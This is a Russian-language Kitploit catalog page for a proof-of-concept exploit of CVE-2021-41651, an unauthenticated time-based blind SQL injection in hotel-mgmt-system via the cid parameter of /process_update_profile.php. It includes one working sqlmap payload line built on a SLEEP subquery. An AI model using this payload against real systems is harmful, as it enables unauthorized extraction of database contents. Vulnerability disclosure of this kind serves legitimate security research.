Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-41651 — Эксплойт доказательства концепции для CVE-2021-41651, демонстрирующий неаутентифицированную временную слепую SQL-инъекцию в hotel-mgmt-system через параметр cid, что позволяет извлекать конфиденциальные данные из MySQL. | Kitploit
Инструменты/GitHubGitHub/mobiusbinary/cve-2021-41651
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubmobiusbinary/cve-2021-41651

CVE-2021-41651

Эксплойт доказательства концепции для CVE-2021-41651, демонстрирующий неаутентифицированную временную слепую SQL-инъекцию в hotel-mgmt-system через параметр cid, что позволяет извлекать конфиденциальные данные из MySQL.

Репозиторий
14 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-41651

CVE-2021-41651 SQL-инъекция в hotel-mgmt-system

hotel-mgmt-system уязвим для неаутентифицированной атаки time-based blind SQL-инъекции.

Параметр cid на странице /process_update_profile.php не санирует пользовательский ввод, что позволяет злоумышленнику извлекать конфиденциальные данные из нижележащей базы данных MySQL.

Ссылка на приложение

hotel-mgmt-system

Затронутые компоненты и параметр

URL: /process_update_profile.php
ПАРАМЕТР: cid

PoC

Полезные нагрузки SQLMAP

Параметр cid на странице /process_update_profile.php

Parameter: cid ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: phone=123456778&cid=14 AND (SELECT 9048 FROM (SELECT(SLEEP(5)))zCfD)-- IKdVf&submitBtn=Update&fullName=James&[email protected]&newPassword=fasdfasdfasdfasdfasdf-

Если изображение PoC неясно, нажмите на GIF, чтобы загрузить его в лучшем разрешении.

POC - CID

Обнаружено

Jason Colyvas
MOBIUSBINARY
23 сентября 2021 года

Скачать инструмент